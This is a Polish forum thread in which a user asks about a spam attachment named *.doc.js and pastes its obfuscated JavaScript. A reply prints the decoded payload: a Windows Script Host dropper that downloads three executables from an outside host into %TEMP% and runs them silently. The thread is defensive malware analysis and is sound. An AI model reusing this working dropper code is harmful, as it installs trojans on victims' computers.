Załącznik spamu - prośba o analizę Opcje

[verio]

Witam,

Regularnie na moją służbową skrzynkę pocztową przychodzi wiadomość z załącznikiem *.doc.js. Z ciekawości otworzyłem ją edytorem tekstu i zobaczyłem zawiły kod, którego nie potrafię zrozumieć. Co on ma na celu?

[PHP] pobierz, plaintext 
var y="eqzuv mozzcabs sjzabg hkjlif hnajxfq lensyw svqbwai sjzabg ccumrm gvxlofb hetbiqi etwlpf eqzuv lhkqo ebgecjee eqzuv sjzabg ebgecjee lhkqo sjzabg qdzzct ccumrm rjvok ccumrm tjdemt uujfgqxx lhkqo ccumrm jvwzmps crsokw ccumrm bqxbbqv ccumrm sjzabg fjgwxtcw jvwzmps ccumrm hkuptly hkjlif hnajxfq lensyw tjdemt fjgwxtcw irmonc cvdlfo odcvn ejgpyvm fjgwxtcw hkjlif hnajxfq etwlpf bohlr cnkgq woeonrr hkjlif lhkqo lensyw pcvsks hnajxfq gcqem woeonrr rfwwl fjgwxtcw hetbiqi hetbiqi bohlr qdzzct vsjty ccumrm tjdemt uujfgqxx lhkqo ccumrm eqzuv sjzabg ccumrm bqxbbqv ccumrm jvwzmps crsokw gcqem byxmy bkhnp pcvsks uujfgqxx sjzabg gvxlofb byxmy sjzabg tjdemt lensyw lhkqo svqbwai sjzabg ebkbd fjgwxtcw sjzabg hnajxfq woeonrr hnajxfq lhkqo lensyw sjzabg bcwewdth crsokw etwlpf bohlr optfq jqnwg byxmy hsxltcez ylkyi optfq bohlr qdzzct zvsbwjib bohlr qxiax qxiax bohlr zvsbwjib eqzuv sjzabg vsjty ccumrm tjdemt uujfgqxx lhkqo ccumrm bkhnp svqbwai ccumrm bqxbbqv ccumrm sjzabg fjgwxtcw jvwzmps ccumrm hkuptly hkjlif hnajxfq lensyw tjdemt fjgwxtcw irmonc cvdlfo odcvn ejgpyvm fjgwxtcw hkjlif hnajxfq etwlpf bohlr hsxltcez woeonrr irmonc hsxltcez zghog sloef gcqem irmonc hsxltcez zghog svpegcl jqnwg jqnwg ylkyi bohlr qdzzct vsjty ccumrm bkhnp svqbwai gcqem svqbwai sjzabg lhkqo fjgwxtcw uujfgqxx gvxlofb giketp crsokw hnajxfq uujfgqxx hnajxfq fjgwxtcw hkjlif rfwwl uujfgqxx sjzabg bcwewdth fjgwxtcw ccumrm bqxbbqv ccumrm eqzuv mozzcabs sjzabg hkjlif hnajxfq lensyw svqbwai sjzabg etwlpf qdzzct ccumrm rjvok ccumrm lensyw eqzuv ccumrm etwlpf bkhnp svqbwai gcqem lhkqo fjgwxtcw uujfgqxx gvxlofb giketp woeonrr hnajxfq uujfgqxx hnajxfq fjgwxtcw ccumrm bqxbbqv bqxbbqv bqxbbqv ccumrm ezmnxy qdzzct ccumrm rjvok ccumrm tjdemt uujfgqxx lhkqo ccumrm bkhnp uujfgqxx ccumrm bqxbbqv ccumrm sjzabg fjgwxtcw jvwzmps ccumrm hkuptly hkjlif hnajxfq lensyw tjdemt fjgwxtcw irmonc cvdlfo odcvn ejgpyvm fjgwxtcw hkjlif hnajxfq etwlpf bohlr hkuptly mbdejcq cvdlfo mbdejcq ghrnr gcqem woeonrr hnajxfq lhkqo fjgwxtcw uujfgqxx ebkbd bohlr qdzzct vsjty ccumrm bkhnp uujfgqxx gcqem svqbwai pcvsks fjgwxtcw sjzabg etwlpf qdzzct vsjty ccumrm bkhnp uujfgqxx gcqem hnajxfq giketp pcvsks fjgwxtcw ccumrm bqxbbqv ccumrm sevpg vsjty ccumrm bkhnp uujfgqxx gcqem jvwzmps lhkqo lensyw hnajxfq fjgwxtcw etwlpf bkhnp svqbwai gcqem nowkrbvw fjgwxtcw crsokw pcvsks svqbwai sjzabg crsokw fjgwxtcw ghrnr svqbwai gvxlofb giketp qdzzct vsjty ccumrm bkhnp uujfgqxx gcqem pcvsks svqbwai crsokw lensyw hnajxfq lensyw svqbwai sjzabg ccumrm bqxbbqv ccumrm vuqmgvsn vsjty ccumrm bkhnp uujfgqxx gcqem crsokw uujfgqxx tjdemt fjgwxtcw jqnwg svqbwai xowyqjpt lensyw hetbiqi fjgwxtcw etwlpf eqzuv sjzabg ebgecjee sloef qdzzct vsjty ccumrm bkhnp uujfgqxx gcqem hkjlif hetbiqi svqbwai crsokw fjgwxtcw etwlpf qdzzct vsjty ccumrm pcsvxsqf vsjty ccumrm pcsvxsqf vsjty ccumrm bkhnp svqbwai gcqem svqbwai pcvsks fjgwxtcw sjzabg etwlpf bohlr xxzdenu byxmy jqnwg bohlr ebgecjee eqzuv lhkqo ebgecjee eqzuv uujfgqxx hetbiqi crsokw fjgwxtcw qdzzct vsjty ccumrm bkhnp svqbwai gcqem crsokw fjgwxtcw sjzabg gvxlofb etwlpf qdzzct vsjty ccumrm lensyw eqzuv ccumrm etwlpf lhkqo sjzabg ccumrm qqvqltzg ccumrm vuqmgvsn qdzzct ccumrm rjvok ccumrm hnajxfq lhkqo giketp ccumrm rjvok ccumrm jvwzmps crsokw gcqem nowkrbvw mozzcabs sjzabg etwlpf eqzuv sjzabg ebgecjee vuqmgvsn ebgecjee vuqmgvsn qdzzct vsjty ccumrm pcsvxsqf ccumrm hkjlif uujfgqxx hnajxfq hkjlif rfwwl ccumrm etwlpf fjgwxtcw lhkqo qdzzct ccumrm rjvok pcsvxsqf vsjty ccumrm pcsvxsqf vsjty ccumrm pcsvxsqf vsjty ccumrm gvxlofb hetbiqi etwlpf bohlr rfwwl hnajxfq hnajxfq pcvsks sbhsgatw rssahwqu rssahwqu ebkbd odcvn odcvn gvxlofb odcvn hetbiqi gcqem odcvn lensyw sjzabg uujfgqxx lhkqo giketp hkjlif lhkqo uujfgqxx eqzuv hnajxfq fjgwxtcw lhkqo gcqem hkjlif svqbwai ebkbd rssahwqu gvxlofb svqbwai hkjlif mozzcabs ebkbd fjgwxtcw sjzabg hnajxfq gcqem pcvsks rfwwl pcvsks ixnjo lensyw gvxlofb bqxbbqv yjjusg ezmnxy yjjusg wuhsqyy yjjusg ketqdz yjjusg byxmy sevpg wuhsqyy sevpg mbdejcq sevpg wuhsqyy sevpg vuqmgvsn vuqmgvsn sevpg vuqmgvsn erzryozr sloef ezmnxy sevpg ezmnxy sevpg vyiuv vuqmgvsn ghrnr sevpg vuqmgvsn vuqmgvsn sevpg sevpg wuhsqyy sevpg vuqmgvsn ezmnxy hkuptly vuqmgvsn wuhsqyy vuqmgvsn ghrnr vuqmgvsn erzryozr ezmnxy hkuptly sevpg ezmnxy vuqmgvsn awhpqq juufcxls lhkqo sjzabg gvxlofb bqxbbqv sloef osfbuyl sevpg sevpg vuqmgvsn yjjusg sevpg bohlr ebgecjee bohlr awhpqq yjjusg erzryozr vuqmgvsn vyiuv ezmnxy erzryozr yjjusg gcqem fjgwxtcw bkhnp fjgwxtcw bohlr ebgecjee sevpg qdzzct vsjty ccumrm gvxlofb hetbiqi etwlpf bohlr rfwwl hnajxfq hnajxfq pcvsks sbhsgatw rssahwqu rssahwqu ebkbd odcvn odcvn gvxlofb odcvn hetbiqi gcqem odcvn lensyw sjzabg uujfgqxx lhkqo giketp hkjlif lhkqo uujfgqxx eqzuv hnajxfq fjgwxtcw lhkqo gcqem hkjlif svqbwai ebkbd rssahwqu gvxlofb svqbwai hkjlif mozzcabs ebkbd fjgwxtcw sjzabg hnajxfq gcqem pcvsks rfwwl pcvsks ixnjo lensyw gvxlofb bqxbbqv yjjusg ezmnxy yjjusg wuhsqyy yjjusg ketqdz yjjusg byxmy sevpg wuhsqyy sevpg mbdejcq sevpg wuhsqyy sevpg vuqmgvsn vuqmgvsn sevpg vuqmgvsn erzryozr sloef ezmnxy sevpg ezmnxy sevpg vyiuv vuqmgvsn ghrnr sevpg vuqmgvsn vuqmgvsn sevpg sevpg wuhsqyy sevpg vuqmgvsn ezmnxy hkuptly vuqmgvsn wuhsqyy vuqmgvsn ghrnr vuqmgvsn erzryozr ezmnxy hkuptly sevpg ezmnxy vuqmgvsn awhpqq juufcxls lhkqo sjzabg gvxlofb bqxbbqv osfbuyl vyiuv ezmnxy vyiuv osfbuyl osfbuyl sloef bohlr ebgecjee bohlr awhpqq sloef yjjusg erzryozr awhpqq sevpg osfbuyl wuhsqyy gcqem fjgwxtcw bkhnp fjgwxtcw bohlr ebgecjee sevpg qdzzct vsjty ccumrm gvxlofb hetbiqi etwlpf bohlr rfwwl hnajxfq hnajxfq pcvsks sbhsgatw rssahwqu rssahwqu ebkbd odcvn odcvn gvxlofb odcvn hetbiqi gcqem odcvn lensyw sjzabg uujfgqxx lhkqo giketp hkjlif lhkqo uujfgqxx eqzuv hnajxfq fjgwxtcw lhkqo gcqem hkjlif svqbwai ebkbd rssahwqu gvxlofb svqbwai hkjlif mozzcabs ebkbd fjgwxtcw sjzabg hnajxfq gcqem pcvsks rfwwl pcvsks ixnjo lensyw gvxlofb bqxbbqv yjjusg ezmnxy yjjusg wuhsqyy yjjusg ketqdz yjjusg byxmy sevpg wuhsqyy sevpg mbdejcq sevpg wuhsqyy sevpg vuqmgvsn vuqmgvsn sevpg vuqmgvsn erzryozr sloef ezmnxy sevpg ezmnxy sevpg vyiuv vuqmgvsn ghrnr sevpg vuqmgvsn vuqmgvsn sevpg sevpg wuhsqyy sevpg vuqmgvsn ezmnxy hkuptly vuqmgvsn wuhsqyy vuqmgvsn ghrnr vuqmgvsn erzryozr ezmnxy hkuptly sevpg ezmnxy vuqmgvsn awhpqq juufcxls lhkqo sjzabg gvxlofb bqxbbqv sevpg wuhsqyy sevpg osfbuyl vuqmgvsn yjjusg osfbuyl bohlr ebgecjee bohlr ezmnxy awhpqq sevpg awhpqq ezmnxy osfbuyl ezmnxy sloef gcqem fjgwxtcw bkhnp fjgwxtcw bohlr ebgecjee sevpg qdzzct vsjty";var x="fpzper vmxzae gcibazy enztmq qmlfrknl gvsjqx llqqmf mvrsy epwryrt dxduts nousppr tllbufah apwkhwj blmfnyn vdjsnd eqwqw ybsfmt xthih nxvgs pmivqiq jboksg kttww ifcplfhs mphkruqd uqaakdq pysgonh lphuu darvxm jomptnpq hknkmea mfmrg ntrllwz ccumrm mifegb bohlr gqjii ioadhcxz optfq juufcxls dneplxov etwlpf qdzzct udkoh zvsbwjib ebgecjee jqpgw gcqem rssahwqu vuqmgvsn sevpg sloef osfbuyl ezmnxy yjjusg vyiuv wuhsqyy awhpqq erzryozr sbhsgatw vsjty nhblt bqxbbqv qqvqltzg ixnjo dbnejm hkuptly ghrnr ketqdz mbdejcq byxmy xowyqjpt xxzdenu svpegcl pbyrs dhlcbvql mvhza zghog hsxltcez visvt cvdlfo ylkyi zdgadc nowkrbvw woeonrr jqnwg hkinnxu rqymc cnkgq irmonc feldtg ickzc acmipagb qxiax ikvgrki udendkd htpbvjwo tznzfb uujfgqxx odcvn hkjlif gvxlofb fjgwxtcw eqzuv bcwewdth rfwwl lensyw ejgpyvm qrstmql hetbiqi ebkbd sjzabg svqbwai pcvsks ajacd lhkqo crsokw hnajxfq mozzcabs tjdemt jvwzmps bkhnp giketp fifxjmt rjvok rcupolyb pcsvxsqf jrajl gndrzu";v=eval;x=x.split(" ");y=y.split(" ");var c=""; var s=String;function z() { return "C"; };function q() { return "from"+z()+"har"+z()+"ode"; };function h(w) { for (var i=0; i<x.length; i++) if (w == x[i]) { c += s[q()](i); return; }; };for (var i=0; i<y.length; i++) h(y[i]);v(c);
[PHP] pobierz, plaintext 

Tutaj to samo na pastebin.com

Ten post edytował verio 3.12.2014, 09:33:52

[freemp3]

Taki jest kod wynikowy wykonywany na końcu:

Kod

function dl(fr,fn,rn)
{
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%")+"\\"+fn;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState === 4) {
            var xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn,2);
            xa.close();
        };
    };
    xo.open("GET",fr,false);
    xo.send();
    if (rn > 0) {
        try {
            ws.Run(fn,0,0);
        }
        catch (er) {

        };
    };
};
dl("http://mbbdbl.binarycrafter.com/document.php?id=54575C5E171D171001092414160B100117104A070B094A1408&rnd=2311051","85906495.exe",1);
dl("http://mbbdbl.binarycrafter.com/document.php?id=54575C5E171D171001092414160B100117104A070B094A1408&rnd=3646332","82598137.exe",1);
dl("http://mbbdbl.binarycrafter.com/document.php?id=54575C5E171D171001092414160B100117104A070B094A1408&rnd=1713053","48184342.exe",1);

Może ktoś będzie wiedział co dokładnie to robi

[trueblue]

Ściąga trojana i go uruchamia.

[verio]

Wydaje się jakby pobierał binarkę z urla, zapisywał ją pod nazwą z drugiego parametru funkcji dl i jeśli trzeci parametr jest większy od zera - uruchamiał ją.

Dziękuję za pomoc.

P.S. Nie planuję dalej sprawdzać co się stanie :-)